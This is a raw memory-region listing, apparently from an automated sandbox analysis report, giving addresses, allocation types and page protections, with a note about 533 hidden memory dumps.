23C4EC2F000
heap
page read and write
23C4ECAF000
heap
page read and write
23C5093B000
heap
page read and write
75A0000
trusted library allocation
page read and write
7070000
heap
page read and write
2972000
heap
page read and write
2CB4000
trusted library allocation
page read and write
225CE000
stack
page read and write
4750000
heap
page read and write
86B0000
direct allocation
page read and write
23D58970000
heap
page read and write
221F0000
heap
page read and write
23C4EE3A000
heap
page read and write
23C4EBC0000
heap
page read and write
3154000
heap
page read and write
23C50949000
heap
page read and write
23C50949000
heap
page read and write
23D5A0D0000
heap
page read and write
6E30000
direct allocation
page read and write
7FFD34AA0000
trusted library allocation
page read and write
6EC0000
heap
page read and write
719E000
stack
page read and write
23C4ECBD000
heap
page read and write
7FFD3478B000
trusted library allocation
page read and write
72671FC000
stack
page read and write
23C50931000
heap
page read and write
5AB5000
trusted library allocation
page read and write
AD4E8FE000
stack
page read and write
8392000
heap
page read and write
23C4EC12000
heap
page read and write
7FFD34A40000
trusted library allocation
page read and write
23D5BBC0000
trusted library allocation
page read and write
7FFD34773000
trusted library allocation
page execute and read and write
2C50000
heap
page read and write
2C80000
trusted library section
page read and write
726783B000
stack
page read and write
7FFD34990000
trusted library allocation
page read and write
2279E000
stack
page read and write
27FC000
heap
page read and write
726830D000
stack
page read and write
8670000
direct allocation
page read and write
4855000
heap
page execute and read and write
7291000
heap
page read and write
2D43000
heap
page read and write
23D5AA8E000
trusted library allocation
page read and write
2B6E000
stack
page read and write
23C50D97000
heap
page read and write
7600000
trusted library allocation
page read and write
2B88000
heap
page read and write
8730000
direct allocation
page read and write
81B5000
trusted library allocation
page read and write
834E000
stack
page read and write
23D726D8000
heap
page read and write
7FFD34AD0000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
726727F000
stack
page read and write
23C4ECCB000
heap
page read and write
23C50945000
heap
page read and write
6D90000
direct allocation
page read and write
2478AFA0000
heap
page read and write
758D000
stack
page read and write
3157000
heap
page read and write
3155000
heap
page read and write
1A0000
heap
page read and write
23C4EE37000
heap
page read and write
23C4ECC7000
heap
page read and write
72676BE000
stack
page read and write
6E40000
direct allocation
page read and write
23D58625000
heap
page read and write
23C50931000
heap
page read and write
7FFD34820000
trusted library allocation
page read and write
83C9000
heap
page read and write
23D58550000
heap
page read and write
7650000
trusted library allocation
page read and write
278C000
stack
page read and write
4900000
trusted library allocation
page execute and read and write
3144000
heap
page read and write
23D5AA7B000
trusted library allocation
page read and write
72677BE000
stack
page read and write
8590000
trusted library allocation
page read and write
2A00000
heap
page read and write
23C50921000
heap
page read and write
8660000
trusted library allocation
page read and write
2478B160000
heap
page read and write
75D0000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
489E000
stack
page read and write
72673FE000
stack
page read and write
23C50949000
heap
page read and write
23D5A8D2000
trusted library allocation
page read and write
705F000
stack
page read and write
8050000
trusted library allocation
page read and write
2A0E000
unkown
page read and write
23D5866E000
heap
page read and write
6DF0000
direct allocation
page read and write
23D5A76B000
trusted library allocation
page read and write
72674BE000
stack
page read and write
23C50DDD000
heap
page read and write
8680000
direct allocation
page read and write
23C4EC38000
heap
page read and write
726838A000
stack
page read and write
23C4EC35000
heap
page read and write
22570000
direct allocation
page read and write
229E0000
heap
page read and write
47DF000
stack
page read and write
23C4ECA7000
heap
page read and write
277D000
stack
page read and write
2974000
heap
page read and write
23D726A9000
heap
page read and write
481E000
stack
page read and write
ADBB000
direct allocation
page execute and read and write
6D2D000
stack
page read and write
227DF000
stack
page read and write
273F000
unkown
page read and write
7FFD349F0000
trusted library allocation
page read and write
23D5AA41000
trusted library allocation
page read and write
71E0000
heap
page read and write
23D58560000
heap
page read and write
2B5E000
stack
page read and write
23C5093C000
heap
page read and write
312A000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
2291C000
stack
page read and write
23D59FF2000
trusted library allocation
page read and write
6D30000
heap
page readonly
7410000
trusted library allocation
page read and write
48DE000
stack
page read and write
295C000
heap
page read and write
23D6A2C1000
trusted library allocation
page read and write
23C4EC7B000
heap
page read and write
23D5AA59000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
4A77000
trusted library allocation
page read and write
72672FE000
stack
page read and write
23D58629000
heap
page read and write
23C50929000
heap
page read and write
23D5C0FB000
trusted library allocation
page read and write
2CB0000
trusted library allocation
page read and write
8690000
direct allocation
page read and write
4910000
heap
page read and write
2295E000
stack
page read and write
22550000
direct allocation
page read and write
2976000
heap
page read and write
23C5093F000
heap
page read and write
23C5093B000
heap
page read and write
23D5A325000
trusted library allocation
page read and write
23C5093C000
heap
page read and write
701E000
stack
page read and write
2B0F000
unkown
page read and write
2271C000
stack
page read and write
8640000
trusted library allocation
page execute and read and write
E1D000
stack
page read and write
2478B0A0000
heap
page read and write
23D5A110000
heap
page read and write
23C50988000
heap
page read and write
2CA0000
trusted library allocation
page read and write
23C4EE39000
heap
page read and write
2DD5000
heap
page read and write
726840B000
stack
page read and write
2CEA000
trusted library allocation
page execute and read and write
7640000
trusted library allocation
page read and write
81E0000
trusted library allocation
page read and write
23C5093F000
heap
page read and write
2C90000
trusted library section
page read and write
6E80000
heap
page read and write
23C4ECB8000
heap
page read and write
6D60000
direct allocation
page read and write
6E10000
direct allocation
page read and write
23C5093A000
heap
page read and write
8740000
direct allocation
page read and write
23C4EC9E000
heap
page read and write
30DE000
heap
page read and write
23D6A2A1000
trusted library allocation
page read and write
2CDA000
heap
page read and write
5989000
trusted library allocation
page read and write
7F370000
trusted library allocation
page execute and read and write
662B000
remote allocation
page execute and read and write
23C4EE3A000
heap
page read and write
7FFD34826000
trusted library allocation
page read and write
6E77000
heap
page read and write
2478B155000
heap
page read and write
228DE000
stack
page read and write
722D000
heap
page read and write
522B000
remote allocation
page execute and read and write
80D0000
heap
page read and write
23C4ECA7000
heap
page read and write
46B0000
trusted library allocation
page execute and read and write
279D000
stack
page read and write
23D5A060000
heap
page execute and read and write
23C5093B000
heap
page read and write
7FFD34AC0000
trusted library allocation
page read and write
2BF0000
heap
page read and write
23D5BF20000
trusted library allocation
page read and write
726820E000
stack
page read and write
2B20000
heap
page read and write
23D585E0000
heap
page read and write
23C4EC34000
heap
page read and write
7FFD34856000
trusted library allocation
page execute and read and write
830C000
stack
page read and write
7296000
heap
page read and write
23C50931000
heap
page read and write
23D5A4C6000
trusted library allocation
page read and write
23C4EB60000
heap
page read and write
72BF000
heap
page read and write
7FFD34960000
trusted library allocation
page execute and read and write
8FBB000
direct allocation
page execute and read and write
7FFD34774000
trusted library allocation
page read and write
6F6B000
stack
page read and write
2B80000
heap
page read and write
6E70000
heap
page read and write
5921000
trusted library allocation
page read and write
23D7289A000
heap
page read and write
72A3000
heap
page read and write
8407000
heap
page read and write
83D6000
heap
page read and write
6E6A000
stack
page read and write
2BDE000
stack
page read and write
8630000
trusted library allocation
page read and write
2BF8000
heap
page read and write
1B0000
heap
page read and write
23C50DB8000
heap
page read and write
2C60000
heap
page read and write
83C2000
heap
page read and write
E5E000
stack
page read and write
231D000
stack
page read and write
4850000
heap
page execute and read and write
263E000
unkown
page read and write
463E000
stack
page read and write
7FFD3492A000
trusted library allocation
page read and write
2B70000
heap
page read and write
229DE000
stack
page read and write
2C4E000
stack
page read and write
23C50960000
heap
page read and write
6E20000
direct allocation
page read and write
4710000
trusted library allocation
page read and write
23C4ECB2000
heap
page read and write
6DD0000
direct allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
23D72773000
heap
page read and write
81D0000
trusted library allocation
page execute and read and write
726828E000
stack
page read and write
8720000
direct allocation
page read and write
28F0000
heap
page read and write
23C4EC11000
heap
page read and write
30F3000
heap
page read and write
2CF5000
trusted library allocation
page execute and read and write
8140000
trusted library allocation
page read and write
72670FE000
stack
page read and write
23D59FB0000
heap
page readonly
23D725EE000
heap
page read and write
8030000
heap
page read and write
2478B150000
heap
page read and write
862D000
stack
page read and write
71DE000
stack
page read and write
754E000
stack
page read and write
6F2D000
stack
page read and write
2D9E000
heap
page read and write
7FFD349E0000
trusted library allocation
page read and write
D6464FF000
unkown
page read and write
726743E000
stack
page read and write
2B4E000
stack
page read and write
AD4DD6B000
stack
page read and write
2299D000
stack
page read and write
7FFD349B0000
trusted library allocation
page read and write
2CC0000
trusted library allocation
page read and write
45FE000
stack
page read and write
30AF000
stack
page read and write
23C50931000
heap
page read and write
7266D63000
stack
page read and write
2275C000
stack
page read and write
23C50949000
heap
page read and write
23C4ECAF000
heap
page read and write
23D5C02C000
trusted library allocation
page read and write
4658000
trusted library allocation
page read and write
23C50956000
heap
page read and write
23D5A2A1000
trusted library allocation
page read and write
275D000
stack
page read and write
812F000
stack
page read and write
4660000
remote allocation
page execute and read and write
2478B080000
heap
page read and write
23C50A40000
heap
page read and write
4758000
heap
page read and write
23D72AB0000
heap
page read and write
2B9E000
stack
page read and write
306E000
stack
page read and write
6E00000
direct allocation
page read and write
4921000
trusted library allocation
page read and write
3142000
heap
page read and write
48F0000
trusted library allocation
page read and write
AD4EAFB000
stack
page read and write
2478B260000
heap
page read and write
6D80000
direct allocation
page read and write
2CBE000
stack
page read and write
7FFD34A50000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
23D728C2000
heap
page read and write
2D35000
heap
page read and write
23C5093B000
heap
page read and write
23D585C0000
heap
page read and write
7301000
heap
page read and write
4983000
trusted library allocation
page read and write
2B1E000
stack
page read and write
23D5AA6B000
trusted library allocation
page read and write
7FFD34A20000
trusted library allocation
page read and write
6DB0000
direct allocation
page read and write
22560000
direct allocation
page read and write
73F0000
trusted library allocation
page read and write
726707D000
stack
page read and write
2260F000
stack
page read and write
746A000
trusted library allocation
page read and write
23D5A030000
trusted library allocation
page read and write
There are 533 hidden memdumps, click here to show them.